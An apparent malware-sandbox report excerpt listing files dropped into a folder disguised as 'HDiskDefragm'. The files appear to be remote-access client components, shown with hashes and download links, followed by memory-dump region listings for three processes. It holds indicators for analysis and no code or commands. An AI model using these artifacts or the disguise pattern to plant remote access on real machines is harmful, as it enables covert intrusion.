5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\HDiskDefragm\HTCTL32.DLL

Filesize
320KB

MD5
2d3b207c8a48148296156e5725426c7f

SHA1
ad464eb7cf5c19c8a443ab5b590440b32dbc618f

SHA256
edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796

SHA512
55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

Download Submit
C:\Users\Admin\AppData\Roaming\HDiskDefragm\NSM.LIC

Filesize
253B

MD5
12b8cc1d0a34012bbbbe86880333c567

SHA1
e89659c412af82e31e6d14c34e47d7cc4c5ec9a5

SHA256
9c48ab2790281fca8d75abc805e6091f1b8133898852e6c09657d66f3dd0c48f

SHA512
eb44405dc70b40f15463c075f57b535b6e7c5132a34a99a62d663566ddc50b82f329c40880ab4a5425fe41077d5eec2c28baa500d3b27182ac5f104038ca00dc

Download Submit
C:\Users\Admin\AppData\Roaming\HDiskDefragm\PCICL32.dll

Filesize
3.5MB

MD5
d16ffa06a35601a73b73836bf905ed19

SHA1
b8231d36f921e5b75b592ea3374f19216a5c411f

SHA256
80cc439a0633add1dd964bb6bb40ccdcfec3ae28da39fd9416642ab0605d40ab

SHA512
e79b8cfbdd4d86742420a334ab6e0d70bcd3393ab8b07ae6d49ec435aef2bcbd07681774ac7e66eca41c11aa086b398440f74f0b1b77087aa2c18b76c6f3a168

Download Submit
C:\Users\Admin\AppData\Roaming\HDiskDefragm\client32.exe

Filesize
33KB

MD5
290c26b1579fd3e48d60181a2d22a287

SHA1
e4c91a7f161783c68cf67250206047f23bd25a29

SHA256
973836529b57815903444dd5d4b764e8730986b1bd87179552f249062ee26128

SHA512
114a9f068b36a1edf5cce9269057f0cc17b22a10cd73cbed3ef42ae71324e41363e543a3af8be57b410c533b62bcf7f28650b464cce96e0e6c14819cdb90129a

Download Submit
C:\Users\Admin\AppData\Roaming\HDiskDefragm\client32.ini

Filesize
733B

MD5
0cdedc9a0a1ee8c9f7ca140e543f2f1c

SHA1
2540f9e3c63b6174a60324b137ffb5697c1a7df8

SHA256
3e63adc8fd536f6045c8ffde42649350f13df7b7d2f7f988f4bfb0591bf9afb6

SHA512
068deac28541fb62792f49a3e368ea9949e3dba93f6c23a942d28e0d9ae87e3bb25a878a9d777a2ec2dc4b918fc0a357f7ce7534c22c62128f2fe2a7c7a14ae2

Download Submit
C:\Users\Admin\AppData\Roaming\HDiskDefragm\msvcr100.dll

Filesize
755KB

MD5
0e37fbfa79d349d672456923ec5fbbe3

SHA1
4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

SHA256
8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

SHA512
2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

Download Submit
C:\Users\Admin\AppData\Roaming\HDiskDefragm\pcicapi.dll

Filesize
32KB

MD5
dcde2248d19c778a41aa165866dd52d0

SHA1
7ec84be84fe23f0b0093b647538737e1f19ebb03

SHA256
9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917

SHA512
c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

Download Submit
C:\Users\Admin\AppData\Roaming\HDiskDefragm\pcichek.dll

Filesize
18KB

MD5
a0b9388c5f18e27266a31f8c5765b263

SHA1
906f7e94f841d464d4da144f7c858fa2160e36db

SHA256
313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a

SHA512
6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

Download Submit
memory/1604-152-0x00000000071B0000-0x0000000007246000-memory.dmp

Filesize
600KB

Download
memory/1604-153-0x00000000065B0000-0x00000000065D2000-memory.dmp

Filesize
136KB

Download
memory/1604-180-0x0000000007F00000-0x0000000007F12000-memory.dmp

Filesize
72KB

Download
memory/1604-178-0x0000000007E60000-0x0000000007E71000-memory.dmp

Filesize
68KB

Download
memory/1604-169-0x0000000007880000-0x0000000007894000-memory.dmp

Filesize
80KB

Download
memory/1604-250-0x0000000008030000-0x0000000008038000-memory.dmp

Filesize
32KB

Download
memory/1604-249-0x0000000007FF0000-0x000000000800A000-memory.dmp

Filesize
104KB

Download
memory/1604-248-0x0000000007FB0000-0x0000000007FC5000-memory.dmp

Filesize
84KB

Download
memory/1604-247-0x0000000007FA0000-0x0000000007FAE000-memory.dmp

Filesize
56KB

Download
memory/1604-154-0x00000000078B0000-0x0000000007E56000-memory.dmp

Filesize
5.6MB

Download
memory/1604-168-0x0000000007710000-0x0000000007734000-memory.dmp

Filesize
144KB

Download
memory/1604-181-0x0000000007400000-0x000000000740A000-memory.dmp

Filesize
40KB

Download
memory/1604-238-0x000000006E790000-0x000000006EAE7000-memory.dmp

Filesize
3.3MB

Download
memory/1604-155-0x00000000073A0000-0x00000000073D4000-memory.dmp

Filesize
208KB

Download
memory/1604-156-0x0000000074AD0000-0x0000000074B1C000-memory.dmp

Filesize
304KB

Download
memory/1604-165-0x00000000073E0000-0x00000000073FE000-memory.dmp

Filesize
120KB

Download
memory/1604-166-0x0000000007410000-0x00000000074B4000-memory.dmp

Filesize
656KB

Download
memory/1604-167-0x00000000075B0000-0x00000000075BA000-memory.dmp

Filesize
40KB

Download
memory/2040-35-0x0000000061E00000-0x0000000061EF3000-memory.dmp

Filesize
972KB

Download
memory/2040-33-0x00000000127F0000-0x0000000012A34000-memory.dmp

Filesize
2.3MB

Download
memory/2040-124-0x00000000127F0000-0x0000000012A34000-memory.dmp

Filesize
2.3MB

Download
memory/2040-34-0x00000000127F0000-0x0000000012A34000-memory.dmp

Filesize
2.3MB

Download
memory/2420-107-0x00000000050B0000-0x00000000056DA000-memory.dmp

Filesize
6.2MB

Download
memory/2420-143-0x0000000071B30000-0x00000000722E1000-memory.dmp

Filesize
7.7MB

Download
memory/2420-142-0x0000000071B30000-0x00000000722E1000-memory.dmp

Filesize
7.7MB

Download
memory/2420-141-0x0000000071B3E000-0x0000000071B3F000-memory.dmp

Filesize
4KB

Download
memory/2420-140-0x0000000006310000-0x000000000632A000-memory.dmp

Filesize
104KB

Download
memory/2420-139-0x0000000007470000-0x0000000007AEA000-memory.dmp

Filesize
6.5MB

Download
memory/2420-123-0x0000000005E20000-0x0000000005E3E000-memory.dmp

Filesize
120KB

Download
memory/2420-125-0x0000000005E40000-0x0000000005E8C000-memory.dmp

Filesize
304KB

Download
memory/2420-118-0x0000000005960000-0x0000000005CB7000-memory.dmp

Filesize
3.3MB

Download
memory/2420-112-0x00000000058F0000-0x0000000005956000-memory.dmp

Filesize
408KB

Download
memory/2420-111-0x0000000005880000-0x00000000058E6000-memory.dmp

Filesize
408KB

Download
memory/2420-110-0x00000000057E0000-0x0000000005802000-memory.dmp

Filesize
136KB

Download
memory/2420-109-0x0000000071B30000-0x00000000722E1000-memory.dmp

Filesize
7.7MB

Download
memory/2420-108-0x0000000071B30000-0x00000000722E1000-memory.dmp

Filesize
7.7MB

Download
memory/2420-106-0x0000000002980000-0x00000000029B6000-memory.dmp

Filesize
216KB

Download
memory/2420-105-0x0000000071B3E000-0x0000000071B3F000-memory.dmp

Filesize
4KB

Download
memory/2420-278-0x0000000071B30000-0x00000000722E1000-memory.dmp

Filesize
7.7MB

Download